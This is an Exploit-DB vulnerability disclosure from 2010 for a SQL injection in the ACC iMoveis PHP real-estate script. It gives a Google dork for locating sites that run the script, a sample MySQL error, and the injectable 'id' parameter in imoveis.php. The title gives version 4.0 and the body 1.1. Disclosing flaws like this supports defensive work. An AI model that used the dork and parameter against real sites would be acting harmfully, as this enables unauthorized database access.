ACC IMoveis 4.0 - SQL Injection

EDB-ID:

15338


Author:

EraGoN

Type:

webapps


Platform:

PHP

Date:

2010-10-27


# Exploit Title : iMoveis SQL Injection Vulnerability
# Date : 26/10/2010
# Author : EraGoN
# Software link : http://baixar7.com/download/acc-imoveis-script-php.rar/3d1e7bf4b9
# Version : 1.1
# Tested on : Linux / Windows XP


# Dork :

inurl:imoveis.php?id=

#Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server

version for the right syntax to use near '20'' at line 1

#Vuln :

http://www.site.org/imoveis.php?id=20


**Proud to be Muslim
**Proud to be Albanian
**www.eragon.ws

Contact : eragon@legends.ag


[ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ]
[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ]